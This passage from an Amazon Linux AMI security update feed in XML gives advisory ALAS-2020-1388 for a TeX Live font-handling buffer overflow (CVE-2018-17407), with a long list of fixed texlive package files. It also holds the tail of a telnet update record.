</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10188" title="" id="CVE-2020-10188" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="telnet-debuginfo" version="0.17" release="49.9.amzn1" epoch="1" arch="x86_64"><filename>Packages/telnet-debuginfo-0.17-49.9.amzn1.x86_64.rpm</filename></package><package name="telnet-server" version="0.17" release="49.9.amzn1" epoch="1" arch="x86_64"><filename>Packages/telnet-server-0.17-49.9.amzn1.x86_64.rpm</filename></package><package name="telnet" version="0.17" release="49.9.amzn1" epoch="1" arch="x86_64"><filename>Packages/telnet-0.17-49.9.amzn1.x86_64.rpm</filename></package><package name="telnet" version="0.17" release="49.9.amzn1" epoch="1" arch="i686"><filename>Packages/telnet-0.17-49.9.amzn1.i686.rpm</filename></package><package name="telnet-server" version="0.17" release="49.9.amzn1" epoch="1" arch="i686"><filename>Packages/telnet-server-0.17-49.9.amzn1.i686.rpm</filename></package><package name="telnet-debuginfo" version="0.17" release="49.9.amzn1" epoch="1" arch="i686"><filename>Packages/telnet-debuginfo-0.17-49.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1388</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1388: medium priority package update for texlive</title><issued date="2020-06-23 06:44:00" /><updated date="2020-06-26 04:47:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-17407:
An issue was discovered in t1_check_unusual_charstring functions in writet1.c files in TeX Live before 2018-09-21. A buffer overflow in the handling of Type 1 fonts allows arbitrary code execution when a malicious font is loaded by one of the vulnerable tools: pdflatex, pdftex, dvips, or luatex.
1632802: CVE-2018-17407 texlive: Buffer overflow in t1_check_unusual_charstring function in writet1.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17407" title="" id="CVE-2018-17407" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="texlive-changebar-doc" version="svn29349.3.5c" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-changebar-doc-svn29349.3.5c-45.amzn1.noarch.rpm</filename></package><package name="texlive-enctex-doc" version="svn28602.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-enctex-doc-svn28602.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-subfigure-doc" version="svn15878.2.1.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-subfigure-doc-svn15878.2.1.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-xifthen-doc" version="svn15878.1.3" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xifthen-doc-svn15878.1.3-45.amzn1.noarch.rpm</filename></package><package name="texlive-etex-pkg-doc" version="svn15878.2.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-etex-pkg-doc-svn15878.2.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-graphics" version="svn25405.1.0o" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-graphics-svn25405.1.0o-45.amzn1.noarch.rpm</filename></package><package name="texlive-metapost-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-metapost-bin-svn26509.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-ifmtarg" version="svn19363.1.2a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ifmtarg-svn19363.1.2a-45.amzn1.noarch.rpm</filename></package><package name="texlive-placeins" version="svn19848.2.2" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-placeins-svn19848.2.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-wasysym-doc" version="svn15878.2.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-wasysym-doc-svn15878.2.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-kpathsea-lib" version="2012" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-kpathsea-lib-2012-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-koma-script" version="svn27255.3.11b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-koma-script-svn27255.3.11b-45.amzn1.noarch.rpm</filename></package><package name="texlive-fancyvrb" version="svn18492.2.8" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fancyvrb-svn18492.2.8-45.amzn1.noarch.rpm</filename></package><package name="texlive-xcolor" version="svn15878.2.11" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xcolor-svn15878.2.11-45.amzn1.noarch.rpm</filename></package><package name="texlive-mathspec" version="svn15878.0.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mathspec-svn15878.0.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-multirow-doc" version="svn17256.1.6" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-multirow-doc-svn17256.1.6-45.amzn1.noarch.rpm</filename></package><package name="texlive-makecmds-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-makecmds-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-titling" version="svn15878.2.1d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-titling-svn15878.2.1d-45.amzn1.noarch.rpm</filename></package><package name="texlive-rsfs-doc" version="svn15878.0" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-rsfs-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-philokalia" version="svn18651.1.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-philokalia-svn18651.1.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-xifthen" version="svn15878.1.3" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xifthen-svn15878.1.3-45.amzn1.noarch.rpm</filename></package><package name="texlive-norasi-c90" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-norasi-c90-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-overpic-doc" version="svn19712.0.53" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-overpic-doc-svn19712.0.53-45.amzn1.noarch.rpm</filename></package><package name="texlive-pgf-doc" version="svn22614.2.10" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pgf-doc-svn22614.2.10-45.amzn1.noarch.rpm</filename></package><package name="texlive-tipa-doc" version="svn29349.1.3" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tipa-doc-svn29349.1.3-45.amzn1.noarch.rpm</filename></package><package name="texlive-sauerj-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-sauerj-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-xecyr" version="svn20221.1.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xecyr-svn20221.1.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-mdwtools-doc" version="svn15878.1.05.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mdwtools-doc-svn15878.1.05.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-breakurl" version="svn15878.1.30" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-breakurl-svn15878.1.30-45.amzn1.noarch.rpm</filename></package><package name="texlive-xdvi-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-xdvi-bin-svn26509.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-fncychap-doc" version="svn20710.v1.34" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fncychap-doc-svn20710.v1.34-45.amzn1.noarch.rpm</filename></package><package name="texlive-fancyhdr" version="svn15878.3.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fancyhdr-svn15878.3.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-pxfonts" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pxfonts-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-parskip-doc" version="svn19963.2.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-parskip-doc-svn19963.2.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-float-doc" version="svn15878.1.3d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-float-doc-svn15878.1.3d-45.amzn1.noarch.rpm</filename></package><package name="texlive-tex4ht-doc" version="svn29474.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tex4ht-doc-svn29474.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-bidi-doc" version="svn29650.12.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-bidi-doc-svn29650.12.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-lettrine" version="svn29391.1.64" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-lettrine-svn29391.1.64-45.amzn1.noarch.rpm</filename></package><package name="texlive-lm-math" version="svn29044.1.958" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-lm-math-svn29044.1.958-45.amzn1.noarch.rpm</filename></package><package name="texlive-tex-gyre-math-doc" version="svn29045.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tex-gyre-math-doc-svn29045.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-utopia-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-utopia-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-psfrag" version="svn15878.3.04" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-psfrag-svn15878.3.04-45.amzn1.noarch.rpm</filename></package><package name="texlive-ec-doc" version="svn25033.1.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ec-doc-svn25033.1.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-text-doc" version="svn15878.1.00" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-text-doc-svn15878.1.00-45.amzn1.noarch.rpm</filename></package><package name="texlive-xstring-doc" version="svn29258.1.7a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xstring-doc-svn29258.1.7a-45.amzn1.noarch.rpm</filename></package><package name="texlive-txfonts-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-txfonts-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-cite-doc" version="svn19955.5.3" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-cite-doc-svn19955.5.3-45.amzn1.noarch.rpm</filename></package><package name="texlive-unisugar" version="svn22357.0.92" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-unisugar-svn22357.0.92-45.amzn1.noarch.rpm</filename></package><package name="texlive-bibtex-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" 
arch="x86_64"><filename>Packages/texlive-bibtex-bin-svn26509.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-booktabs-doc" version="svn15878.1.61803" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-booktabs-doc-svn15878.1.61803-45.amzn1.noarch.rpm</filename></package><package name="texlive-dvipng-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-dvipng-bin-svn26509.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-unicode-math" version="svn29413.0.7d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-unicode-math-svn29413.0.7d-45.amzn1.noarch.rpm</filename></package><package name="texlive-etex-pkg" version="svn15878.2.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-etex-pkg-svn15878.2.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-garuda-c90" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-garuda-c90-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-type1cm-doc" version="svn21820.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-type1cm-doc-svn21820.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-filehook" version="svn24280.0.5d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-filehook-svn24280.0.5d-45.amzn1.noarch.rpm</filename></package><package name="texlive-dvipdfmx-doc" version="svn26765.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-dvipdfmx-doc-svn26765.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-rcs-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-rcs-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-tools-doc" version="svn26263.0" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-tools-doc-svn26263.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-xstring" version="svn29258.1.7a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xstring-svn29258.1.7a-45.amzn1.noarch.rpm</filename></package><package name="texlive-cm-super" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-cm-super-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-ctable-doc" version="svn26694.1.23" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ctable-doc-svn26694.1.23-45.amzn1.noarch.rpm</filename></package><package name="texlive-wadalab" version="svn22576.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-wadalab-svn22576.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-enumitem-doc" version="svn24146.3.5.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-enumitem-doc-svn24146.3.5.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-l3experimental-doc" version="svn29361.SVN_4467" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-l3experimental-doc-svn29361.SVN_4467-45.amzn1.noarch.rpm</filename></package><package name="texlive-csquotes-doc" version="svn24393.5.1d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-csquotes-doc-svn24393.5.1d-45.amzn1.noarch.rpm</filename></package><package name="texlive-luatexbase" version="svn22560.0.31" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-luatexbase-svn22560.0.31-45.amzn1.noarch.rpm</filename></package><package name="texlive-xtab" version="svn23347.2.3f" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xtab-svn23347.2.3f-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-fill" version="svn15878.1.01" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-pst-fill-svn15878.1.01-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-node" version="svn27799.1.25" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-node-svn27799.1.25-45.amzn1.noarch.rpm</filename></package><package name="texlive-collection-documentation-base" version="svn17091.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-collection-documentation-base-svn17091.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-titling-doc" version="svn15878.2.1d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-titling-doc-svn15878.2.1d-45.amzn1.noarch.rpm</filename></package><package name="texlive-wasysym" version="svn15878.2.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-wasysym-svn15878.2.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-xetexfontinfo" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xetexfontinfo-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-metapost" version="svn26689.1.212" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-metapost-svn26689.1.212-45.amzn1.noarch.rpm</filename></package><package name="texlive-oberdiek" version="svn26725.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-oberdiek-svn26725.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-euro-doc" version="svn22191.1.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-euro-doc-svn22191.1.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-fancyhdr-doc" version="svn15878.3.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fancyhdr-doc-svn15878.3.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-natbib" version="svn20668.8.31b" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-natbib-svn20668.8.31b-45.amzn1.noarch.rpm</filename></package><package name="texlive-mflogo" version="svn17487.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mflogo-svn17487.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-collectbox" version="svn26557.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-collectbox-svn26557.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-setspace-doc" version="svn24881.6.7a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-setspace-doc-svn24881.6.7a-45.amzn1.noarch.rpm</filename></package><package name="texlive-l3experimental" version="svn29361.SVN_4467" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-l3experimental-svn29361.SVN_4467-45.amzn1.noarch.rpm</filename></package><package name="texlive-ulem" version="svn26785.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ulem-svn26785.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-cm-doc" version="svn29581.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-cm-doc-svn29581.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-ucs-doc" version="svn27549.2.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ucs-doc-svn27549.2.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-philokalia-doc" version="svn18651.1.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-philokalia-doc-svn18651.1.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-mdwtools" version="svn15878.1.05.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mdwtools-svn15878.1.05.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-fontbook" version="svn23608.0.2" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-fontbook-svn23608.0.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-kastrup" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-kastrup-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-powerdot-doc" version="svn25656.1.4i" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-powerdot-doc-svn25656.1.4i-45.amzn1.noarch.rpm</filename></package><package name="texlive-setspace" version="svn24881.6.7a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-setspace-svn24881.6.7a-45.amzn1.noarch.rpm</filename></package><package name="texlive-dvipdfm" version="svn26689.0.13.2d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-dvipdfm-svn26689.0.13.2d-45.amzn1.noarch.rpm</filename></package><package name="texlive-latex-fonts" version="svn28888.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-latex-fonts-svn28888.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-section-doc" version="svn20180.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-section-doc-svn20180.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-tetex-doc" version="svn29585.3.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tetex-doc-svn29585.3.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-zapfchan" version="svn28614.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-zapfchan-svn28614.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-microtype" version="svn29392.2.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-microtype-svn29392.2.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-dvipdfmx-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" 
arch="x86_64"><filename>Packages/texlive-dvipdfmx-bin-svn26509.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-xltxtra" version="svn19809.0.5e" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xltxtra-svn19809.0.5e-45.amzn1.noarch.rpm</filename></package><package name="texlive-xesearch-doc" version="svn16041.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xesearch-doc-svn16041.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-luatex-bin" version="svn26912.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-luatex-bin-svn26912.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-xepersian" version="svn29661.12.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xepersian-svn29661.12.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-tex" version="svn26689.3.1415926" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tex-svn26689.3.1415926-45.amzn1.noarch.rpm</filename></package><package name="texlive-collection-fontsrecommended" version="svn28082.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-collection-fontsrecommended-svn28082.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-fixlatvian" version="svn21631.1a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fixlatvian-svn21631.1a-45.amzn1.noarch.rpm</filename></package><package name="texlive-mathpazo" version="svn15878.1.003" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mathpazo-svn15878.1.003-45.amzn1.noarch.rpm</filename></package><package name="texlive-carlisle-doc" version="svn18258.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-carlisle-doc-svn18258.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-coil" version="svn24020.1.06" 
release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-coil-svn24020.1.06-45.amzn1.noarch.rpm</filename></package><package name="texlive-xetexfontinfo-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xetexfontinfo-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-babel" version="svn24756.3.8m" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-babel-svn24756.3.8m-45.amzn1.noarch.rpm</filename></package><package name="texlive-datetime" version="svn19834.2.58" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-datetime-svn19834.2.58-45.amzn1.noarch.rpm</filename></package><package name="texlive-xmltex" version="svn28273.0.8" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xmltex-svn28273.0.8-45.amzn1.noarch.rpm</filename></package><package name="texlive-ncctools-doc" version="svn15878.3.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ncctools-doc-svn15878.3.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-t2-doc" version="svn29349.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-t2-doc-svn29349.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-soul" version="svn15878.2.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-soul-svn15878.2.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-eps" version="svn15878.1.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-eps-svn15878.1.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-natbib-doc" version="svn20668.8.31b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-natbib-doc-svn20668.8.31b-45.amzn1.noarch.rpm</filename></package><package name="texlive-index" version="svn24099.4.1beta" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-index-svn24099.4.1beta-45.amzn1.noarch.rpm</filename></package><package name="texlive-fmtcount-doc" version="svn28068.2.02" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fmtcount-doc-svn28068.2.02-45.amzn1.noarch.rpm</filename></package><package name="texlive-epsf-doc" version="svn21461.2.7.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-epsf-doc-svn21461.2.7.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-helvetic" version="svn28614.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-helvetic-svn28614.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-preprint-doc" version="svn16085.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-preprint-doc-svn16085.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-pgf" version="svn22614.2.10" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pgf-svn22614.2.10-45.amzn1.noarch.rpm</filename></package><package name="texlive-fontware" version="svn26689.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fontware-svn26689.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-coil-doc" version="svn24020.1.06" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-coil-doc-svn24020.1.06-45.amzn1.noarch.rpm</filename></package><package name="texlive-bibtopic" version="svn15878.1.1a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-bibtopic-svn15878.1.1a-45.amzn1.noarch.rpm</filename></package><package name="texlive-base" version="2012" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-base-2012-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-xecolor" version="svn29660.0.1" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-xecolor-svn29660.0.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-collectbox-doc" version="svn26557.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-collectbox-doc-svn26557.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-algorithms" version="svn15878.0.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-algorithms-svn15878.0.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-lm-math-doc" version="svn29044.1.958" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-lm-math-doc-svn29044.1.958-45.amzn1.noarch.rpm</filename></package><package name="texlive-arabxetex" version="svn17470.v1.1.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-arabxetex-svn17470.v1.1.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-xeindex-doc" version="svn16760.0.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xeindex-doc-svn16760.0.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-marvosym" version="svn29349.2.2a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-marvosym-svn29349.2.2a-45.amzn1.noarch.rpm</filename></package><package name="texlive-txfonts" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-txfonts-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-gsftopk-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-gsftopk-bin-svn26509.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-etex-doc" version="svn22198.2.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-etex-doc-svn22198.2.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-mh" version="svn29420.0" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-mh-svn29420.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-cm" version="svn29581.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-cm-svn29581.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-csquotes" version="svn24393.5.1d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-csquotes-svn24393.5.1d-45.amzn1.noarch.rpm</filename></package><package name="texlive-polyglossia" version="svn26163.v1.2.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-polyglossia-svn26163.v1.2.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-fill-doc" version="svn15878.1.01" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-fill-doc-svn15878.1.01-45.amzn1.noarch.rpm</filename></package><package name="texlive-mparhack" version="svn15878.1.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mparhack-svn15878.1.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-wrapfig" version="svn22048.3.6" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-wrapfig-svn22048.3.6-45.amzn1.noarch.rpm</filename></package><package name="texlive-etex" version="svn22198.2.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-etex-svn22198.2.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-psnfss" version="svn23394.9.2a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-psnfss-svn23394.9.2a-45.amzn1.noarch.rpm</filename></package><package name="texlive-fontware-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" 